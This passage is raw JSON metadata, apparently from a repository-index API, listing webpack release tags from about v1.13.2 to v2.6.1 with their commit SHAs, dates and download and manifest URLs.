,{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_u